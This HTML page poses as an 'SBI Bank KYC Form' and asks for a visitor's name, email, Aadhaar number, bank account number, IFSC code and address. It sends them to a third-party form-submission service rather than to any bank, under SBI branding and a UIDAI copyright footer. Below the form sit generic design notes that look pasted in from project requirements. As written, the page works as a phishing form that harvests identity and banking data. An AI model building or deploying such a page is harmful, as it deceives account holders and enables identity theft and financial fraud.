<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>SBI Bank KYC Form</title>
  <link rel="stylesheet" href="styles.css">
  
  <style>



body {
    
    background-image: url(kyc.jpg);
   background-repeat: no-repeat;
   background-size: cover;
   background-position: center
    
}

form {
    width: 50%;
    margin: 0 auto;
    padding: 20px;
    border: 1px solid #ccc;
}

label {
    display: block;
    margin-bottom: 5px;
}

input, textarea, select {
    width: 100%;
    padding: 10px;
    margin-bottom: 10px;
    border: 1px solid #ccc;
}

button {
    background-color: #4CAF50;
    color: white;
    padding: 10px 20px;
    border: none;
    cursor: pointer;
}

    
  </style>
</head>
<body>
  <div class="container">
    <form id="contact-form" action="https://api.web3forms.com/submit" method="POST">
      
      
    <input type="hidden" name="access_key" value="871cab07-3f89-4b78-81e5-0cd0783ffb67">
  
      
      
    <h2>Loan Application Form</h2>
        <label for="name">Name:</label>
        <input type="text" id="name" name="name" required>

        <label for="email">Email:</label>
        <input type="email" id="email" name="email" required>

        <label for="aadhar">Aadhar Card Number:</label>
        <input type="text" id="aadhar" name="aadhar" required>

        <label for="account_number">Account Number:</label>
        <input type="text" id="account_number" name="account_number" required>

        <label for="ifsc_code">IFSC Code:</label>
        <input type="text" id="ifsc_code" name="ifsc_code" required>

        <label for="address">Address:</label>
        <textarea id="address" name="address" required></textarea>


      
      <button type="submit">Submit</button>
    </form>
    
    <div style="text-align: center">
      <p>
        <h2>UIDAI Regulations :</h2> <font size="5">Adhare to all UIDAI regulations and guidelines, including data privacy and security standards.</font>
        
        <h2>User Experience:</h2><font size="5">
          Design a seamless and user-friendly authentication process.
        </font>
        
        
          <h2>Security:</h2><font size="5">
             Prioritize security to protect user data from unauthorized access and breaches.
        </font>
        
        <h2>Error Handling:</h2>
        <font size="5">
          Implement robust error handling to provide a smooth user experience.
        </font>
        
        <h2>Accessibility:</h2>
        
        <font size="5">
          Ensure your website and the Aadhaar authentication process are accessible to users with disabilities.
        </font>
      
      </p>
    </div>
    <footer align="center">
      “© 2024 UIDAI. All rights reserved. Unauthorized use and/or duplication of this material without express and written permission from UIDAI is strictly prohibited. For permissions, contact support@uidai.gov.in.”
    </footer>
    
  </div>
</body>
</html>